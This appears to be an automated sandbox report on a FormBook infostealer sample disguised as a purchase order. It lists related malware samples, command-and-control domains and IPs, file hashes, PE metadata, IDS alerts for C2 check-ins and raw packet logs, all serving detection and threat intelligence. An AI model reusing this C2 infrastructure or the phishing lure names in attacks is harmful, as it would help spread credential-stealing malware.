                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • www.mavonorm-global.uk/ia1k/
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • www.mavonorm-global.uk/ia1k/
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • www.mavonorm-global.uk/ia1k/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                www.ilodezu.comPI No 20000814C.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 188.114.96.3
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                www.allgiftedmalaysia.comPurchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 216.40.34.41
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 216.40.34.41
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 216.40.34.41
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 216.40.34.41
                                www.bade.inkPurchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 149.88.84.60
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 149.88.84.60
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 149.88.84.60
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 149.88.84.60
                                www.shopnaya.frinquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                quotation.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                Payment invoice.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                quote.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 212.227.172.254
                                SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 212.227.172.254
                                www.ceo-retreats.co.ukUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 46.30.215.104
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Purchase Order_20240516.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AMAZON-02USSecuriteInfo.com.ELF.Remotehack-A.30964.4562.elfGet hashmaliciousUnknownBrowse
                                • 54.171.230.55
                                UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                • 34.249.145.219
                                i0GHEh10ne.elfGet hashmaliciousMirai, OkiruBrowse
                                • 34.254.182.186
                                eId5V85KKM.elfGet hashmaliciousUnknownBrowse
                                • 54.101.89.128
                                0xh0roxxnavebusyoo.arm7.elfGet hashmaliciousMiraiBrowse
                                • 18.163.57.17
                                https://sudanesesport.com/Get hashmaliciousUnknownBrowse
                                • 65.9.86.127
                                http://82.165.254.110/loginmso.phpGet hashmaliciousHTMLPhisherBrowse
                                • 176.34.167.98
                                https://tiny-crumble-2e94fb.netlify.app/instruct.html/Get hashmaliciousUnknownBrowse
                                • 18.192.94.96
                                https://aquamarine-tartufo-riqueza.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                • 3.72.140.173
                                https://bespoke-croquembouche-6486c6.netlify.app/about.html/Get hashmaliciousUnknownBrowse
                                • 3.70.101.28
                                GD-EMEA-DC-SXB1DEPlatosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 92.205.8.26
                                http://ageofimmortalsgame.com/wth1uGet hashmaliciousPhisherBrowse
                                • 92.205.17.86
                                https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.phpGet hashmaliciousUnknownBrowse
                                • 92.205.17.86
                                file.exeGet hashmaliciousUnknownBrowse
                                • 134.119.25.81
                                EST- 250424-0370pdf.exeGet hashmaliciousFormBookBrowse
                                • 92.205.170.193
                                Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 92.205.8.26
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 92.205.15.157
                                Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                • 92.205.15.157
                                file.exeGet hashmaliciousSystemBCBrowse
                                • 92.205.48.138
                                nPLN.exeGet hashmaliciousFormBookBrowse
                                • 92.205.15.157
                                ONECOMDKUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 46.30.215.97
                                justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 46.30.215.97
                                Offer Document 23.lnkGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                qtCWL0lgfX.exeGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                Offer Document 24.lnkGet hashmaliciousFormBookBrowse
                                • 46.30.213.191
                                COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 77.111.241.124
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 46.30.215.104
                                Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                                • 104.37.39.71
                                Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 46.30.215.104
                                BODIS-NJUSUSD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                Shipping Document.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 199.59.243.225
                                COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                • 199.59.243.225
                                USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
                                • 199.59.243.225
                                w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                • 199.59.243.225

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order_20240528.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\Purchase Order_20240528.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Temp\7--93mK-

                                Download File
                                Process:C:\Windows\SysWOW64\nslookup.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.1239949490932863
                                Encrypted:false
                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                MD5:271D5F995996735B01672CF227C81C17
                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.964294378330883
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Purchase Order_20240528.exe
                                File size:729'608 bytes
                                MD5:b6422c6c56cdab2a43415fdcceeaf3e6
                                SHA1:e05e478ce595c575d20f26b9cecc027068af5cd4
                                SHA256:91c657cef25403ba946ecfe02fa69010169e8ab2515d3a1608b405ac3d12c1cd
                                SHA512:b54797ea0c33eff6328a1548e4804e3a04e392d89a17ae6f507a778a6b7aa5a0d027707afe8805ac24f2f556aafd33e43dddb4b455b4bd9a43dd022f5020f629
                                SSDEEP:12288:1KcJV/xL+hxh/ZmLtf1NamPJ79GaBMu02wuRgxpAg7jcXWFEaM3By1GkR:oYtN5nGGMNSGAg7tXn
                                TLSH:5CF4129A76347793C2B58AF051F6C1224BF0274B2BB0D7D92DD524DB0AE2F984386D1B
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ECUf..............0......&........... ........@.. .......................`............@................................

                                File Icon

                                Icon Hash:4c9e97336b69cda2

                                Static PE Info

                                General

                                Entrypoint:0x4ae39e
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66554345 [Tue May 28 02:36:53 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Authenticode Signature

                                Signature Valid:false
                                Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                Subject Chain
                                • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                Version:3
                                Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                Serial:7C1118CBBADC95DA3752C46E47A27438

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xae34c0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x2270.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0xaec000x3608
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xac3a40xac400eaeac73bab83f2528b1d8407275c8595False0.9576137858309144data7.971095603069869IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xb00000x22700x2400d099f3ff62101f648197db42154c5924False0.8408203125data7.411115113608818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xb40000xc0x200b79bf82fd012f745c57f9bde664ed686False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xb01000x1c70PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9625
                                RT_GROUP_ICON0xb1d800x14data1.05
                                RT_VERSION0xb1da40x2ccdata0.4273743016759777
                                RT_MANIFEST0xb20800x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/28/24-07:16:53.334171TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.676.223.67.189
                                05/28/24-07:18:01.720040TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975380192.168.2.6108.179.192.228
                                05/28/24-07:15:38.516275TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971380192.168.2.63.33.130.190
                                05/28/24-07:18:15.208740TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975780192.168.2.6149.88.84.60
                                05/28/24-07:17:09.283748TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973880192.168.2.6216.40.34.41
                                05/28/24-07:16:42.377017TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973080192.168.2.692.205.15.157
                                05/28/24-07:16:15.498664TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972280192.168.2.6199.59.243.225
                                05/28/24-07:17:20.398275TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.6203.161.43.227
                                05/28/24-07:18:17.738015TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975880192.168.2.6149.88.84.60
                                05/28/24-07:15:52.921989TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971880192.168.2.6212.227.172.254
                                05/28/24-07:16:12.940995TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.6199.59.243.225
                                05/28/24-07:16:55.860764TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973480192.168.2.676.223.67.189
                                05/28/24-07:17:47.272667TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974980192.168.2.6178.63.50.103
                                05/28/24-07:17:33.834488TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.6185.229.21.229
                                05/28/24-07:16:26.572363TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972580192.168.2.646.30.215.104
                                05/28/24-07:17:06.750149TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.6216.40.34.41
                                05/28/24-07:17:49.818347TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.6178.63.50.103
                                05/28/24-07:18:49.380784TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976180192.168.2.63.33.130.190
                                05/28/24-07:16:29.112208TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972680192.168.2.646.30.215.104
                                05/28/24-07:16:39.845789TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972980192.168.2.692.205.15.157
                                05/28/24-07:18:04.253452TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.6108.179.192.228
                                05/28/24-07:18:51.922417TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34976280192.168.2.63.33.130.190
                                05/28/24-07:17:22.933853TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974280192.168.2.6203.161.43.227
                                05/28/24-07:17:36.363867TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.6185.229.21.229
                                05/28/24-07:15:50.391688TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971780192.168.2.6212.227.172.254
                                05/28/24-07:15:35.984016TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34971280192.168.2.63.33.130.190

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 28, 2024 07:15:19.248938084 CEST4971180192.168.2.6188.114.97.3
                                May 28, 2024 07:15:19.253793955 CEST8049711188.114.97.3192.168.2.6
                                May 28, 2024 07:15:19.253869057 CEST4971180192.168.2.6188.114.97.3
                                May 28, 2024 07:15:19.255884886 CEST4971180192.168.2.6188.114.97.3
                                May 28, 2024 07:15:19.260883093 CEST8049711188.114.97.3192.168.2.6
                                May 28, 2024 07:15:20.921492100 CEST8049711188.114.97.3192.168.2.6
                                May 28, 2024 07:15:20.922207117 CEST8049711188.114.97.3192.168.2.6
                                May 28, 2024 07:15:20.922260046 CEST4971180192.168.2.6188.114.97.3
                                May 28, 2024 07:15:20.924166918 CEST4971180192.168.2.6188.114.97.3
                                May 28, 2024 07:15:20.929011106 CEST8049711188.114.97.3192.168.2.6
                                May 28, 2024 07:15:35.977261066 CEST4971280192.168.2.63.33.130.190
                                May 28, 2024 07:15:35.982408047 CEST80497123.33.130.190192.168.2.6
                                May 28, 2024 07:15:35.982497931 CEST4971280192.168.2.63.33.130.190
                                May 28, 2024 07:15:35.984015942 CEST4971280192.168.2.63.33.130.190
                                May 28, 2024 07:15:35.988907099 CEST80497123.33.130.190192.168.2.6
                                May 28, 2024 07:15:36.445631027 CEST80497123.33.130.190192.168.2.6
                                May 28, 2024 07:15:36.445691109 CEST4971280192.168.2.63.33.130.190
                                May 28, 2024 07:15:37.491154909 CEST4971280192.168.2.63.33.130.190
                                May 28, 2024 07:15:37.496336937 CEST80497123.33.130.190192.168.2.6
                                May 28, 2024 07:15:38.509557009 CEST4971380192.168.2.63.33.130.190
                                May 28, 2024 07:15:38.514585972 CEST80497133.33.130.190192.168.2.6
                                May 28, 2024 07:15:38.514688015 CEST4971380192.168.2.63.33.130.190
                                May 28, 2024 07:15:38.516274929 CEST4971380192.168.2.63.33.130.190
                                May 28, 2024 07:15:38.521104097 CEST80497133.33.130.190192.168.2.6
                                May 28, 2024 07:15:38.980671883 CEST80497133.33.130.190192.168.2.6
                                May 28, 2024 07:15:38.980734110 CEST4971380192.168.2.63.33.130.190
                                May 28, 2024 07:15:40.050564051 CEST4971380192.168.2.63.33.130.190
                                May 28, 2024 07:15:40.055726051 CEST80497133.33.130.190192.168.2.6
                                May 28, 2024 07:15:42.322551966 CEST4971480192.168.2.63.33.130.190
                                May 28, 2024 07:15:42.327516079 CEST80497143.33.130.190192.168.2.6
                                May 28, 2024 07:15:42.327604055 CEST4971480192.168.2.63.33.130.190
                                May 28, 2024 07:15:42.330183029 CEST4971480192.168.2.63.33.130.190
                                May 28, 2024 07:15:42.335056067 CEST80497143.33.130.190192.168.2.6
                                May 28, 2024 07:15:42.335222006 CEST80497143.33.130.190192.168.2.6
                                May 28, 2024 07:15:42.797715902 CEST80497143.33.130.190192.168.2.6
                                May 28, 2024 07:15:42.797893047 CEST4971480192.168.2.63.33.130.190
                                May 28, 2024 07:15:43.835458994 CEST4971480192.168.2.63.33.130.190
                                May 28, 2024 07:15:43.840629101 CEST80497143.33.130.190192.168.2.6
                                May 28, 2024 07:15:44.852890968 CEST4971580192.168.2.63.33.130.190
                                May 28, 2024 07:15:44.857896090 CEST80497153.33.130.190192.168.2.6
                                May 28, 2024 07:15:44.857976913 CEST4971580192.168.2.63.33.130.190
                                May 28, 2024 07:15:44.859586954 CEST4971580192.168.2.63.33.130.190
                                May 28, 2024 07:15:44.864435911 CEST80497153.33.130.190192.168.2.6
                                May 28, 2024 07:15:45.333337069 CEST80497153.33.130.190192.168.2.6
                                May 28, 2024 07:15:45.333482981 CEST80497153.33.130.190192.168.2.6
                                May 28, 2024 07:15:45.333535910 CEST4971580192.168.2.63.33.130.190
                                May 28, 2024 07:15:45.335639000 CEST4971580192.168.2.63.33.130.190
                                May 28, 2024 07:15:45.340421915 CEST80497153.33.130.190192.168.2.6
                                May 28, 2024 07:15:50.384979010 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:50.390048981 CEST8049717212.227.172.254192.168.2.6
                                May 28, 2024 07:15:50.390121937 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:50.391688108 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:50.399039030 CEST8049717212.227.172.254192.168.2.6
                                May 28, 2024 07:15:51.055104017 CEST8049717212.227.172.254192.168.2.6
                                May 28, 2024 07:15:51.055278063 CEST8049717212.227.172.254192.168.2.6
                                May 28, 2024 07:15:51.055404902 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:51.897417068 CEST4971780192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.915399075 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.920397997 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:52.920490026 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.921988964 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:52.926809072 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575499058 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575553894 CEST8049718212.227.172.254192.168.2.6
                                May 28, 2024 07:15:53.575722933 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:54.452100992 CEST4971880192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.462286949 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.467339993 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:55.467659950 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.469028950 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:55.474009037 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:55.474081993 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103212118 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103262901 CEST8049719212.227.172.254192.168.2.6
                                May 28, 2024 07:15:56.103380919 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:56.975610018 CEST4971980192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.296833992 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.301953077 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.302047968 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.304367065 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:58.309278965 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.947814941 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.948544979 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:15:58.948702097 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:59.724533081 CEST4972080192.168.2.6212.227.172.254
                                May 28, 2024 07:15:59.729696989 CEST8049720212.227.172.254192.168.2.6
                                May 28, 2024 07:16:12.934411049 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.939450026 CEST8049721199.59.243.225192.168.2.6
                                May 28, 2024 07:16:12.939533949 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.940994978 CEST4972180192.168.2.6199.59.243.225
                                May 28, 2024 07:16:12.945880890 CEST8049721199.59.243.225192.168.2.6
